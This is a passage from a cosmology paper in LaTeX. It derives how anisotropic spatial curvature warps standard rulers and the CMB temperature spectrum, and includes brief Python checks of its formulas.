\Delta \phi & = & \frac{\Delta L}{3 \, t_r^{\frac{2}{3}} \, t_0^{\frac{1}{3}}} \left( 1 + \frac{3}{5} \, \Omega_{k_0}\right)
\label{Eqn:rphiangle}
\end{eqnarray}
The angular size of a standard ruler thus changes when its location and orientation are changed (see figure \ref{Fig:rulers}). For a ruler located at $z = 0$ ({\it i.e.} $\theta = \frac{\pi}{2}$) the warp of the angle (in equations \eqref{Eqn:AngleChange} and \eqref{Eqn:rphiangle}) changes from $\left( 1 + \frac{3}{5} \, \Omega_{k_0}\right)$ for a ruler in the $\left( r, \phi \right)$ plane to $\left( 1 - \frac{1}{5} \, \Omega_{k_0}\right)$ for a ruler oriented in the $z$ direction. Similarly, as a ruler oriented in the $z$ direction is moved from $\theta_0 = 0$ to $\theta_0 = \frac{\pi}{2}$, the angular warp factor changes from $\left( 1 + \frac{1}{5} \, \Omega_{k_0}\right)$ to $\left( 1 - \frac{1}{5} \, \Omega_{k_0}\right)$, following \eqref{Eqn:AngleChange}. The reason for this change can be traced to the fact that for a ruler oriented in the $z$ direction, all of the angular warp occurs due to the effect of the curvature on the scale factor. $a\left( t \right)$ and $b\left( t \right)$ expand as though they have the same magnitude of the curvature but with opposite sign. Consequently, the angular warps along the two directions also have the same magnitude, but are of opposite sign. This angular dependence is an inevitable consequence of the anisotropic curvature $\Omega_k$ endemic to this metric. We note that this measurement of the anisotropic curvature is relatively immune to degeneracies from the cosmological expansion history since the angular size changes depending upon the orientation of the ruler along every line of sight. We discuss how this measurement can be realized using CMB measurements in section \ref{SubSec:StatisticalAnisotropy}.
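As a concrete illustration, the warp factors in \eqref{Eqn:AngleChange} and \eqref{Eqn:rphiangle} can be checked numerically. The sketch below (Python with NumPy; the value of $\Omega_{k_0}$ is purely illustrative) verifies the limiting cases quoted above.

```python
import numpy as np

# Illustrative value of the present-day anisotropic curvature (not a measurement)
omega_k0 = 1e-4

def warp_z_ruler(theta):
    """Angular warp factor for a ruler oriented along z, from eq. (AngleChange)."""
    return 1 + (omega_k0 / 5) * np.cos(2 * theta)

def warp_rphi_ruler():
    """Angular warp factor for a ruler in the (r, phi) plane, from eq. (rphiangle)."""
    return 1 + (3 / 5) * omega_k0

# A z-oriented ruler: warp is 1 + Omega/5 at theta = 0 and 1 - Omega/5 at theta = pi/2
assert np.isclose(warp_z_ruler(0.0) - 1, +omega_k0 / 5)
assert np.isclose(warp_z_ruler(np.pi / 2) - 1, -omega_k0 / 5)
# At theta = pi/2 the (r, phi) ruler and the z ruler differ by (4/5) Omega_k0
assert np.isclose(warp_rphi_ruler() - warp_z_ruler(np.pi / 2), (4 / 5) * omega_k0)
```

The fractional difference between the two orientations at a single location, $\frac{4}{5}\Omega_{k_0}$, is the orientation-dependent signal that survives along every line of sight.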
\subsection{Effect on the CMB}
\label{SubSec:CMB}
The CMB offers a unique probe of the space-time geometry between the surface of last scattering and the current epoch. The spectral characteristics of the CMB photons at the time of last scattering are well determined. Differences between this well determined spectrum and observations of the local flux of CMB photons arise during the propagation of the photons from recombination to the present epoch. These differences can be used to trace the space-time geometry since these photons travel along null geodesics of the geometry. In this section, we use the trajectories of CMB photons computed in sub section \ref{SubSec:Rulers} to derive the spectrum of the CMB flux observed today.
The CMB flux observed at O (see figure \ref{Fig:geodesics}) is
\begin{eqnarray}
\Phi_0 \left( E_0 \right) & = & \frac{dN_0\left( E_0 \right)}{\sin\theta_0 d\theta_0 d\phi_0 dA_0 dt_0 dE_0}
\label{Eqn:flux}
\end{eqnarray}
where $dN_0\left( E_0 \right)$ is the number of photons with energies between $E_0$ and $E_0 + dE_0$ received at O within a solid angle $\sin\theta_0 d\theta_0 d\phi_0$ in an area $dA_0$ during a time $dt_0$. The angle $\theta_0$ is defined as per \eqref{Eqn:thetadefinition} since that definition corresponds to the physical angle that a local observer measures between the photon's trajectory and the $z$ axis. The photons that are received at O within this solid angle were emitted from the point P on the surface of last scattering $\Sigma$ (see figure \ref{Fig:geodesics}). Since the geometry of the universe (equation \eqref{Eqn:sinhmetric}) is curved, the solid angle $\sin\theta_P d\theta_P d\phi_P$ is different from the solid angle at O. The energy $E_P$ at which the photon is emitted is also different from the energy $E_0$ at which it is received owing to the expansion of the universe. Furthermore, due to the differential expansion of the $\left( r, \phi \right)$ plane and the $z$ direction, this energy shift is also a function of the solid angle. The photons received in the space-time volume $dA_0\, dt_0$ are emitted from a volume $dA_P \, dt_P$. The ratio of these volume elements is proportional to the expansion of the universe. Incorporating these effects, the flux \eqref{Eqn:flux} can be expressed as
\begin{eqnarray}
\Phi_0 \left( E_0 \right) & = & \frac{dN_P\left( E_P \right)}{\sin\theta_P d\theta_P d\phi_P dA_P dt_P dE_P} \left(\frac{\sin\theta_P d\theta_P d\phi_P}{\sin\theta_0 d\theta_0 d\phi_0}\right) \left(\frac{dA_P dt_P}{dA_0 dt_0}\right) \left(\frac{dE_P}{dE_0}\right)
\label{Eqn:fluxcalculus}
\end{eqnarray}
or, in terms of the emission flux $\Phi_P$,
\begin{eqnarray}
\Phi_0 \left( E_0 \right) & = & \Phi_P \left( E_P \right) \left(\frac{\sin\theta_P d\theta_P d\phi_P}{\sin\theta_0 d\theta_0 d\phi_0}\right) \left(\frac{dA_P \,dt_P}{dA_0 \, dt_0}\right) \left(\frac{dE_P}{dE_0}\right)
\label{Eqn:fluxrelation}
\end{eqnarray}
To find the local flux, we have to relate the geometric and energy elements in \eqref{Eqn:fluxrelation} at P to those at O. We begin with the angle $\theta_0$. Using the definition \eqref{Eqn:thetadefinition} of $\theta$ and the solution \eqref{Eqn:Geodesics} for the geodesic, we solve for $\theta_0$ along the null geodesic and find that
\begin{eqnarray}
\theta_0 &=& \theta_P + \frac{1}{5}\Omega_{k_0} \sin \left( 2 \, \theta_P \right) + \mathcal{O} \left( \Omega_{k_P}\right) + \mathcal{O} \left( \Omega_{k}^2\right)
\label{Eqn:thetasolution}
\end{eqnarray}
where $\theta_0$ and $\theta_P$ are the angles of the photon's trajectory at the observer's present location O and the point P (see figure \ref{Fig:geodesics}) on the surface of last scattering which is connected to O by the null geodesic. We have ignored contributions of order $\Omega_{k_P}$, the fractional energy in curvature at the time of recombination, in this solution. This is justified since $\Omega_{k_P} \ll \Omega_{k_0}$. The angle $\phi$ is unaffected by the anisotropic curvature since there is an $O\left( 2 \right)$ symmetry in the $\left( r, \phi \right)$ plane. Consequently, $d \phi_0 = d \phi_P$.
The volume elements are proportional to the expansion of the universe and are given by
\begin{eqnarray}
\frac{dA_P \,dt_P}{dA_0 \, dt_0} &=& \left( \frac{a_P}{a_{0}}\right)^2 \left( \frac{ b_P}{ b_{0}}\right)
\label{Eqn:VolumeRelation}
\end{eqnarray}
where $\left( a_P, b_P \right)$ and $\left( a_0, b_0 \right)$ are the scale factors at the points P and O respectively. Finally, we need to compute the relationship between the observed energy $E_0$ of the photon and the emission energy $E_P$.
The energy E observed by a local observer at some point along the photon's trajectory is given by
\begin{eqnarray}
E^2 &=& \left( a \frac{dr}{d\tau} \right) ^2 + \left( b \frac{dz}{d\tau}\right)^2
\end{eqnarray}
where $\tau$ is an affine parameter along the photon trajectory. Using the geodesic equations \eqref{Eqn:Geodesics} and the above expression, the present day energy $E_0$ is
\begin{eqnarray}
E_0 & = & E_P \left( \frac{a_P}{a_0} \right) \left( 1 - \frac{2}{5} \Omega_{k_0} \cos^{2} \theta_P\right)
\label{Eqn:EnergyRelation}
\end{eqnarray}
Incidentally, this expression can also be arrived at by red shifting the momentum components of the photon along the radial and $z$ directions by $\left( \frac{a_P}{a_0}, \frac{b_P}{b_0} \right)$ respectively.
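A minimal numerical sketch of the redshift relation \eqref{Eqn:EnergyRelation} (Python with NumPy; the values of $\Omega_{k_0}$ and the scale factor ratio are purely illustrative): photons arriving along the $z$ axis are redshifted more than those arriving in the $\left( r, \phi \right)$ plane, by a fraction $\frac{2}{5}\Omega_{k_0}$.

```python
import numpy as np

omega_k0 = 1e-4   # illustrative anisotropic curvature
a_ratio = 1e-3    # illustrative a_P / a_0 (mean expansion since recombination)

def E0_over_EP(theta_P):
    """Observed energy over emitted energy, eq. (EnergyRelation)."""
    return a_ratio * (1 - (2 / 5) * omega_k0 * np.cos(theta_P) ** 2)

# Photons emitted toward us along z (theta_P = 0) arrive with lower energy than
# those emitted in the (r, phi) plane (theta_P = pi/2)
frac = (E0_over_EP(np.pi / 2) - E0_over_EP(0.0)) / E0_over_EP(np.pi / 2)
assert np.isclose(frac, (2 / 5) * omega_k0)
```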
We now have all the ingredients necessary to compute the present day flux $\Phi_0$ given an initial flux $\Phi_P$ at recombination. Since $\Omega_k$ prior to recombination is much smaller than $\Omega_{k_0} \ll 1$, the CMB spectrum at recombination is identical to that of the usual FRW universe. In particular, the CMB at P is a black-body at a temperature $T_P$, with its spectrum, independent of angle, given by the Planck distribution
\begin{eqnarray}
\Phi_P \left( E_P \right) & = & \frac{E_P^2}{\exp\left( \frac{E_P}{T_P} \right) - 1}
\label{Eqn:PlanckDistribution}
\end{eqnarray}
We define $\widetilde{T}_0 = T_P \left( \frac{a_P^2 b_P}{a_0^2 b_0}\right)^{\frac{1}{3}}$. This definition is motivated by the fact that the CMB temperature should redshift roughly as the ratio of the scale factors of expansion. In this anisotropic universe, where two dimensions expand with scale factor $a$ and the other with scale factor $b$, the quantity $\left(\frac{a_P^2 b_P}{a_0^2 b_0}\right)^{\frac{1}{3}}$ is roughly the mean expansion factor. Using \eqref{Eqn:thetasolution}, \eqref{Eqn:VolumeRelation}, \eqref{Eqn:EnergyRelation} and \eqref{Eqn:PlanckDistribution} in \eqref{Eqn:fluxrelation}, we get
\begin{eqnarray}
\Phi_0 \left( E_0, \theta_0 \right) & = & \frac{E_0^2}{\exp\left( \frac{E_0}{\widetilde{T}_0} \left( 1 + \frac{8}{15} \sqrt{\frac{\pi}{5}} \Omega_{k_0} Y_{20} \left( \theta_0, \phi_0 \right) \right) \right) - 1}
\label{Eqn:FinalDistribution}
\end{eqnarray}
where $Y_{20}\left( \theta_0, \phi_0 \right)$ is the spherical harmonic with $l = 2, m=0$.
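The quadrupolar modulation in \eqref{Eqn:FinalDistribution} is exactly the anisotropic redshift of \eqref{Eqn:EnergyRelation}, with its angle-independent part absorbed into $\widetilde{T}_0$. This follows from the identity $\frac{8}{15}\sqrt{\frac{\pi}{5}}\, Y_{20}(\theta) = \frac{2}{5}\cos^2\theta - \frac{2}{15}$, which the short sketch below (Python with NumPy) checks numerically.

```python
import numpy as np

def Y20(theta):
    """Real spherical harmonic Y_20 in the standard normalization."""
    return 0.25 * np.sqrt(5 / np.pi) * (3 * np.cos(theta) ** 2 - 1)

theta = np.linspace(0, np.pi, 1001)
modulation = (8 / 15) * np.sqrt(np.pi / 5) * Y20(theta)
# The cos^2 piece matches the anisotropic redshift in eq. (EnergyRelation);
# the constant -2/15 is the isotropic part absorbed into T~_0
assert np.allclose(modulation, (2 / 5) * np.cos(theta) ** 2 - 2 / 15)
```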
It is well known that primordial density fluctuations lead to temperature anisotropies $\sim 10^{-5}$ in the CMB. The temperature $\widetilde{T}_0$ in \eqref{Eqn:FinalDistribution} inherits these anisotropies and is consequently a function of the angle $\left( \theta, \phi \right)$ in the sky. Using this input, the distribution in \eqref{Eqn:FinalDistribution} describes a blackbody with a temperature
\begin{eqnarray}
T_0 \left( \theta_0, \phi_0 \right) & = &\widetilde{T}_0 \left( \theta_P, \phi_P \right) \left( 1 - \frac{8}{15} \sqrt{\frac{\pi}{5}} \Omega_{k_0} Y_{20} \left( \theta_0, \phi_0\right)\right)
\label{Eqn:CMBTemperature}
\end{eqnarray}
at a given direction $\left( \theta_0, \phi_0 \right)$ in the sky. Note that the relation between the present day temperature $T_0$ and the temperature at recombination $T_P$ is warped both by the multiplicative factor (the term in brackets) in \eqref{Eqn:CMBTemperature} as well as the difference between the angles $\left( \theta_P, \phi_P \right)$ and $\left( \theta_0, \phi_0\right)$. Both these effects are proportional to $\Omega_{k_0}$ and lead to effects in the CMB. In the following subsections, we highlight the key observables of this spectrum.
\subsubsection{The Quadrupole}
\label{SubSec:CMBQuadrupole}
The temperature $T_0 \left( \theta_0, \phi_0 \right)$ is nearly uniform across the sky with an average temperature $\bar{T}_0$ and primordial temperature fluctuations $\sim 10^{-5}$. Substituting for $T_0 \left( \theta_0, \phi_0 \right)$ in \eqref{Eqn:CMBTemperature}, we find that the anisotropic curvature leads to a quadrupole $a_{20} \sim - \bar{T}_0 \, \frac{8}{15} \sqrt{\frac{\pi}{5}} \, \Omega_{k_0}$ (see equation \eqref{Eqn:almdefinition}) in the CMB temperature. The source of this quadrupole is the differential expansion rate of the Universe between the $\left( r, \phi \right)$ plane and the $z$ direction (see equation \eqref{Eqn:sinhmetric}), leading to differential red shifts along these directions. These differential red shifts lead to a quadrupolar warp of the average temperature of the surface of last scattering. Unlike the primordial perturbations which are generated during inflation, this contribution to the quadrupole in the CMB arises from the late time emergence of the anisotropic curvature. Fractionally, the additional power due to this effect is $\sim \Omega_{k_0}$.
Current observations from the WMAP mission constrain the quadrupolar temperature variation to be $\sim 10^{-5}$ \cite{Larson:2010gs}. Naively, this constrains $\Omega_{k_0} \lessapprox 10^{-5}$. However, the quadrupole that is observed in the sky is a sum of the quadrupole from the primordial density fluctuations and this additional contribution from the anisotropic curvature. It is then possible for these two contributions to cancel against each other, leading to a smaller observed quadrupole. This cancellation requires a tuning between the primordial quadrupolar density perturbation and the anisotropic curvature contribution. Additionally, this tuning can be successful only if the primordial quadrupolar perturbation is $\mathcal{O} \left( \Omega_{k_0}\right)$.
The primordial density fluctuations are $\sim 10^{-5}$ and it is difficult for the quadrupolar fluctuations to be much higher than this level. However, in a universe with a small number of e-foldings of inflation, the quadrupole is the mode that leaves the horizon at the very beginning of inflation and is therefore sensitive to physics in the primordial pre-inflationary space-time. These phenomena are not constrained by inflationary physics and they could lead to additional power in the quadrupolar modes \cite{Fialkov:2009xm, Chang:2008gj, Chang:2007eq}. It is therefore possible for the power in the primordial quadrupolar mode to be somewhat larger, allowing a cancellation of the quadrupole from the late time anisotropic curvature. In fact, the measured quadrupole in our universe has significantly less power than expected from a conventional $\Lambda$CDM model \cite{Larson:2010gs}. This anomaly may already be an indication of non-inflationary physics affecting the quadrupole \cite{Freivogel:2005vv}. There is also some uncertainty in the overall size of the quadrupole. For example, astrophysical uncertainties \cite{Bennett:2010jb, Francis:2009pt} could potentially make the quadrupole in the CMB larger by a factor $\sim 2 - 3$. Owing to these uncertainties, it may be possible for $\Omega_{k_0}$ to be as large as $10^{-4}$ without running afoul of observational bounds. Values of $\Omega_{k_0}$ significantly larger than $\sim 10^{-4}$ may also be possible. However, the additional tuning required to cancel the associated quadrupole may disfavor this possibility.
It is interesting to note that anisotropic curvature is much more constrained than isotropic curvature. Current cosmological measurements constrain the isotropic curvature contribution to be $\lessapprox 10^{-2}$ \cite{Larson:2010gs}. However, anisotropic curvature leads to temperature anisotropies in the sky. Since these anisotropies are well constrained by current measurements, the resulting bound $\Omega_{k_0} \lessapprox 10^{-4}$ is more stringent (for example, see \cite{Demianski:2007fz}). This bound is close to the cosmic variance limit $\Omega_{k_0} \approxeq 10^{-5}$. Consequently, there is an observational window $10^{-5} \lessapprox \Omega_{k_0} \lessapprox 10^{-4}$ in which the anisotropic curvature can be discovered.
\subsubsection{Statistical Anisotropy}
\label{SubSec:StatisticalAnisotropy}
In this subsection we discuss the effects of anisotropic curvature on the power spectrum of the CMB. The warping of standard rulers by the anisotropic curvature (see section \ref{SubSec:Rulers}) manifests itself in the CMB through these effects. At the present time, an observer O (see figure \ref{Fig:geodesics}) characterizes the CMB through the spectrum defined by
\begin{equation}
a_{lm}=\int d\Omega\, T_0(\theta_0,\phi_0) Y_{lm}(\theta_0,\phi_0)
\label{Eqn:almdefinition}
\end{equation}
where the present day temperature $T_0$ is defined in equation \eqref{Eqn:CMBTemperature}. The correlation functions $\langle a_{lm} a^*_{l'm'} \rangle$ of this spectrum contain all the information in the CMB. In a statistically isotropic universe, all non-diagonal correlators of the $a_{lm}$ vanish. Anisotropies mix different angular scales and will populate these non-diagonal correlators. We compute them in this section.
$T_0$ inherits the density fluctuations at the time of recombination. Since anisotropies were small prior to recombination, we will assume that the spectrum of density fluctuations at recombination is given by a statistically isotropic, Gaussian distribution. The small anisotropies prior to recombination do alter this distribution and can give rise to additional observables \cite{BlancoPillado:2010uw, Adamek:2010sg}. However, these corrections are proportional to the anisotropic curvature $\Omega_{k_r}$ during recombination \cite{BlancoPillado:2010uw, Adamek:2010sg}. Since $\Omega_{k_r}$ is smaller than the present day anisotropic curvature $\Omega_{k_0}$ by a factor of $\sim 1000$, the experimental observables are dominated by the effects of the late time anisotropic curvature $\Omega_{k_0}$. In order to compute these late time effects, it is sufficient to assume that the spectrum of density fluctuations at recombination is statistically isotropic and Gaussian. We will therefore make this assumption for the rest of the paper. Our task is to start with this spectrum at recombination and compute the characteristics of the CMB spectrum observed by O.
The anisotropic curvature warps the CMB spectrum at O in three ways. First, the photons from the surface of last scattering that reach O do not lie on a spherical surface (see figure \ref{Fig:geodesics}). This warped surface $\Sigma$ is described by equation \eqref{Eqn:Coordinates}, where the deviations from sphericity are proportional to the late time curvature $\Omega_{k_0}$. Second, the angle $\theta_0$ at which the photon is received at O is different from the co-ordinate angle $\beta$ on the surface of recombination at which this photon was originally emitted. Third, the photon is red-shifted when it reaches O. This red-shift also depends upon the angle since the anisotropic curvature causes a differential Hubble expansion leading to anisotropic red-shifts.
We first determine the spectrum on $\Sigma$, the surface from which photons at recombination reach O. $\Sigma$ can be described using spherical coordinates $\left( R, \beta, \phi \right)$ . $R$ is the physical distance at recombination between $O$ and a point $P$ on $\Sigma$ (see figure \ref{Fig:geodesics}), $\beta$ is the polar angle between the $z$ axis and the unit vector at O that lies in the direction of $P$ and $\phi$ is the azimuthal angle. These flat space coordinates appropriately describe the recombination surface since the spatial curvature was very small during this period. In particular, the polar angle $\beta$ is given by
\begin{eqnarray}
\tan \beta & = & \frac{r_P}{z_P}
\label{Eqn:betadefinition}
\end{eqnarray}
while the physical distance $R$ (using equation \eqref{Eqn:Coordinates}) is
\begin{eqnarray}
R\left( \beta \right) & = & 3 \, t_{0}^{\frac{1}{3}} \, t_r^{\frac{2}{3}} \, \left( 1 + \frac{\Omega_{k_0}}{45} - \frac{8 \, \Omega_{k_0}}{45} \sqrt{\frac{\pi}{5}} Y_{20} \left( \beta, \phi \right) \right)
\label{Eqn:Rdefinition}
\end{eqnarray}
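Since $Y_{20}(\beta, \phi) = \frac{1}{4}\sqrt{\frac{5}{\pi}}\left( 3\cos^2\beta - 1\right)$, the surface \eqref{Eqn:Rdefinition} is simply a quadrupolar deformation of a sphere, $R(\beta) \propto 1 - \frac{\Omega_{k_0}}{15}\cos 2\beta$. The short check below (Python with NumPy; the value of $\Omega_{k_0}$ is illustrative) verifies this closed form.

```python
import numpy as np

omega_k0 = 1e-4  # illustrative anisotropic curvature

def Y20(beta):
    """Real spherical harmonic Y_20 in the standard normalization."""
    return 0.25 * np.sqrt(5 / np.pi) * (3 * np.cos(beta) ** 2 - 1)

beta = np.linspace(0, np.pi, 1001)
# Angular shape of R(beta) from eq. (Rdefinition), with the overall 3 t0^(1/3) tr^(2/3) scaled out
shape = 1 + omega_k0 / 45 - (8 * omega_k0 / 45) * np.sqrt(np.pi / 5) * Y20(beta)
# The last-scattering surface is a quadrupolar deformation of a sphere
assert np.allclose(shape, 1 - (omega_k0 / 15) * np.cos(2 * beta))
```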
The spectrum at $\Sigma$ can be characterized by
\begin{equation}
b_{lm}= \left(\frac{a_P^2 \, b_P}{a_0^2 \, b_0}\right)^{1/3}
\int_{\Sigma} d\Omega\, T_{\text{rec}}(\beta, \phi) Y_{lm}(\beta,\phi)
\label{Eqn:blmdefinition}
\end{equation}
where $T_{\text{rec}}$ is the temperature at the recombination surface. The multiplicative factor $\left(\frac{a_P^2 \, b_P}{a_0^2 \, b_0}\right)^{1/3}$ in \eqref{Eqn:blmdefinition} is introduced for convenience. It accounts for the red shift of the mean temperature from the era of recombination to the present time, but does not introduce additional correlations in the power spectrum. With this definition of $b_{lm}$, the correlation functions of the distributions \eqref{Eqn:almdefinition} and \eqref{Eqn:blmdefinition} can be directly compared.
After determining the correlators $b_{lm}$, we will incorporate the effects of the angular and energy warps to the spectrum. Following \cite{Abramo:2010gk}, we express the temperature $T_{\text{rec}} (\vec{P})$ at any point $\vec{P} = \left( R, \, \beta, \, \phi\right)$ on $\Sigma$ by the expansion
\begin{eqnarray}
T_{\text{rec}}(\vec{P}) & = & \int_{\Sigma} \frac{d^{3}k}{\left( 2 \pi\right)^3} \, e^{\, i \vec{k} \cdot \vec{P}} \, \tilde{T}_{\text{rec}}(\vec{k})
\end{eqnarray}
The Fourier components $\tilde{T}_{\text{rec}}(\vec{k})$ represent the power spectrum at recombination. Since the anisotropic curvature is small in the era preceding recombination, the $\tilde{T}_{\text{rec}}(\vec{k})$ are drawn from a statistically isotropic, Gaussian distribution. Writing the term $e^{\, i \vec{k} \cdot \vec{P}}$ using spherical harmonics, we have
\begin{eqnarray}
T_{\text{rec}}(\vec{P}) & = & \int_{\Sigma} \frac{d^{3}k}{\left( 2 \pi\right)^3} \, \tilde{T}_{\text{rec}}(\vec{k}) \, \times \, 4 \pi \sum_{lm} i^l \, j_l \left( k \,R\left( \beta \right) \right) \, Y^{*}_{lm} (\hat{k} ) \, Y_{lm} \left( \beta, \phi \right)
\label{Eqn:blmintegral}
\end{eqnarray}
where $j_l$ are the spherical bessel functions and $Y_{lm}$ are the spherical harmonics. Using the expression for $R$ in equation \eqref{Eqn:Rdefinition}, we expand $R \left( \beta \right)$ for small $\Omega_{k_0}$. Comparing this expansion with the definition of the $b_{lm}$ in equation \eqref{Eqn:blmdefinition}, we have
\begin{eqnarray}
\nonumber
b_{lm} & = & \int_{\Sigma} \frac{d^{3}k}{\left( 2 \pi\right)^3} \, \tilde{T}_{\text{rec}}(\vec{k}) \, \times \, 4 \pi \, i^l \\ && \, \left( j_l \, Y_{lm}^{*} + \Omega_{k_0} \left( - \, d_{l-2} \, f^{l-2,m}_{+2} \, Y^{*}_{l - 2, m}\, + \, d_{l} \, f^{l,m}_{0} \, Y^{*}_{l, m}\, - \, d_{l+2} \, f^{l+2,m}_{-2} \, Y^{*}_{l + 2, m}\right)\right)
\label{Eqn:blmexpression}
\end{eqnarray}
The details of this expansion, including the definitions of the coefficients $d_l$ and $f^{lm}$, can be found in Appendices \ref{AppendixBessel} and \ref{AppendixSpherical}. The $Y_{lm}$ in the above expression are all functions of the unit vector $\hat{k}$ in the integrand. Armed with the expression \eqref{Eqn:blmexpression}, we compute the correlators to first order in $\Omega_{k_0}$. Each $b_{lm}$ receives contributions from the spherical harmonics $Y_{lm}$ and $Y_{l\pm2, m}$. Consequently, we expect non-zero power in the auto correlation of each mode and correlation between modes separated by 2 units of angular momentum. These correlators are
\begin{eqnarray}
\langle b_{lm} \, b^{*}_{lm} \rangle & = & C_{l} \left( 1 \, + \, \frac{16}{45} \, \sqrt{\frac{\pi}{5}} \, \Omega_{k_0}\, \Delta_l \, f^{lm}_{0} \right) \\
\langle b_{lm} \, b^{*}_{l+2, m} \rangle & = & \frac{8}{45} \, \sqrt{\frac{\pi}{5}} \, \Omega_{k_0} \, \left( f^{l+2, m}_{-2} \, \Delta_{l+2} \, C_{l+2} \, + \, f^{lm}_{+2} \, \Delta_l \, C_l \right)
\label{Eqn:blmanswers}
\end{eqnarray}
where the coefficients $\Delta_l$ are $\mathcal{O}\left( 1 \right)$ numbers with a weak dependence on $l$. All other correlators vanish. We relegate the details of this calculation to Appendix \ref{AppendixBessel}.
Let us now relate the coefficients $a_{lm}$ and $b_{lm}$. The present day temperature $T_0$ is given by \eqref{Eqn:CMBTemperature}. The relationship between $\beta$ and $\theta_0$ can be obtained from their respective definitions \eqref{Eqn:betadefinition} and \eqref{Eqn:thetadefinition}. This relationship is given by
\begin{eqnarray}
\beta & = & \theta_0 - \frac{\Omega_{k_0}}{15} \sin 2 \theta_0
\label{Eqn:betasolution}
\end{eqnarray}
Owing to the $O(2)$ symmetry in the $\left( r, \phi \right)$ plane, the angle $\phi$ is the same as the azimuthal angle $\phi_0$ used by O. We use the above relation to expand $T_0$ to leading order in $\Omega_{k_0}$, obtaining
\begin{equation}
\label{eq-effects}
T_{0}\left( \theta_0,\phi_0 \right) = \left(\frac{a_P^2 \, b_P}{a_0^2 \, b_0}\right)^{1/3} \left(
T_\mathrm{rec}(\theta_0,\phi_0) -
\frac{8}{15} \, \sqrt{\frac{\pi}{5}} \, \Omega_{k_0} \, Y_{20}\,
T_\mathrm{rec}(\theta_0,\phi_0) \, - \,
\frac{\Omega_{k_0}}{15} \, \sin(2\theta_0) \, \partial_{\theta_0} \, T_\mathrm{rec}(\theta_0,\phi_0) \right)
\end{equation}
The second term in the above expression arises as a result of the differential red shift caused by the non-isotropic Hubble expansion \eqref{Eqn:CMBTemperature}, while the third term arises due to the warp between the angles $\theta_0$ and $\beta$ (as in equation \eqref{Eqn:betasolution}). This expansion is valid for angular scales $l \lessapprox \left( \Omega_k \right)^{-1}$. Using the spherical harmonic expansions for $T_0$ and $T_{\text{rec}}$ in terms of $a_{lm}$ and $b_{lm}$ respectively, we find
\begin{equation}
\label{eq-almblm}
a_{lm}= b_{lm} - \Omega_{k_0} \, \left( h^{lm}_0 \, b_{lm} + h^{l-2,m}_{+2}\,b_{l-2,m} + h^{l+2,m}_{-2}\, b_{l+2,m} \right)
\end{equation}
The coefficients $h^{lm}$ in \eqref{eq-almblm} are obtained by combining the different spherical harmonics in \eqref{eq-effects}. These coefficients are computed in the Appendix \ref{AppendixSpherical}. Using the correlators of the $b_{lm}$ (see equation \eqref{Eqn:blmanswers}), we can compute the expectation values
\begin{eqnarray}
\nonumber
\langle a_{lm} \, a_{lm}^*\rangle & = & C_{l} \left( 1 + 2 \, \Omega_{k_0} \left( \frac{8}{45} \, \sqrt{\frac{\pi}{5}} \, \Delta_l \, f^{lm}_0 \, + \, h^{lm}_0 \right) \right) \\
\langle a_{lm} \, a_{l+2,m}^*\rangle & = & \Omega_{k_0} \, \left( C_{l+2} \, \left( \frac{8}{45} \, \sqrt{\frac{\pi}{5}} \, \Delta_{l+2} \, f^{l+2,m}_{-2} \, + \, h^{l+2,m}_{-2} \right) \, + \, C_{l} \, \left( \frac{8}{45} \, \sqrt{\frac{\pi}{5}} \, \Delta_l \, f^{lm}_{+2} \, + \, h^{lm}_{+2} \right)\right)
\label{Eqn:almcorrelations}
\end{eqnarray}
Other correlation functions are unaffected by the anisotropic curvature $\Omega_{k_0}$. Equation \eqref{Eqn:almcorrelations} specifies that modes separated by 2 units of angular momentum $l$ are mixed while there is no mixing between modes of different $m$. Physically, this implies correlations between modes of different angular scales (separated by two units of scale), but not of different orientation. The absence of mixing between modes of different orientation is due to the fact that the space-time preserves an $O(2)$ symmetry in the $\left( r, \phi \right)$ plane. However, even though there is no correlation between modes of different $m$, the power $\langle a_{lm} \, a_{lm}^{*} \rangle$ in a mode depends upon $m$ through the coefficients $f^{lm}_0$ and $h^{lm}_0$. Both these coefficients scale as $\sim \left( l^2 - m^2\right)$ (see equations \eqref{Eqn:flmdefinitionAppendix} and \eqref{Eqn:hlmdefinitionAppendix}). Hence, we expect different amounts of power in the high $m$ mode versus the low $m$ mode for a given $l$.
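The angular remapping in the third term of \eqref{eq-effects} is a first-order expansion of $T_{\text{rec}}(\beta)$ about $\theta_0$ using \eqref{Eqn:betasolution}. A quick numerical check with a toy temperature pattern (Python with NumPy; the pattern and the value of $\Omega_{k_0}$ are purely illustrative) confirms that the residual of this expansion is $\mathcal{O}\left(\Omega_{k_0}^2\right)$.

```python
import numpy as np

omega = 1e-3  # illustrative Omega_k0; the small expansion parameter
theta = np.linspace(0.1, np.pi - 0.1, 500)

T_rec = lambda x: np.cos(4 * x)          # toy temperature pattern on Sigma
dT_rec = lambda x: -4 * np.sin(4 * x)    # its derivative

beta = theta - (omega / 15) * np.sin(2 * theta)   # eq. (betasolution)
exact = T_rec(beta)
# first-order expansion: the third term of eq. (eq-effects)
first_order = T_rec(theta) - (omega / 15) * np.sin(2 * theta) * dT_rec(theta)

# the expansion reproduces the exact remapping up to O(omega^2)
assert np.max(np.abs(exact - first_order)) < 10 * omega ** 2
```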
Equipped with the knowledge of the correlators \eqref{Eqn:almcorrelations}, we can perform tests of the statistical isotropy of the CMB. We follow the bipolar power spectrum analysis proposed by \cite{Hajian:2003qq} and adopt their notation (note that the normalization convention adopted by \cite{Hajian:2003qq} is different from that used by the WMAP team \cite{Bennett:2010jb}). In this analysis, one computes the correlator
\begin{eqnarray}
A^{LM}_{ll^{'}} & = & \sum_{m m^{'}} \, \langle a_{lm} \, a^{*}_{l'm'} \rangle \, \left( -1\right)^{m'} \mathcal{C}^{LM}_{l,m,l^{'},-m'}
\label{Eqn:SITest}
\end{eqnarray}
where the $\mathcal{C}^{LM}_{l,m,l^{'},-m^{'}}$ are Clebsch-Gordan coefficients. In a statistically isotropic universe, these correlators are all zero except when $L = 0, M = 0$ and $l = l^{'}$. In the present case, we use the correlators \eqref{Eqn:almcorrelations} to compute the above statistic. For large $l$, the only non-zero correlators are
\begin{eqnarray}
\nonumber
A^{20}_{ll} & \approx & \left( -1\right)^{l} \, \sqrt{l} \, \Omega_{k_0} \, \frac{2}{15} \, \sqrt{\frac{2}{5}} \, C_l \, \left( 1 \, - \, \frac{2}{3} \, \Delta_l \, \right) \\
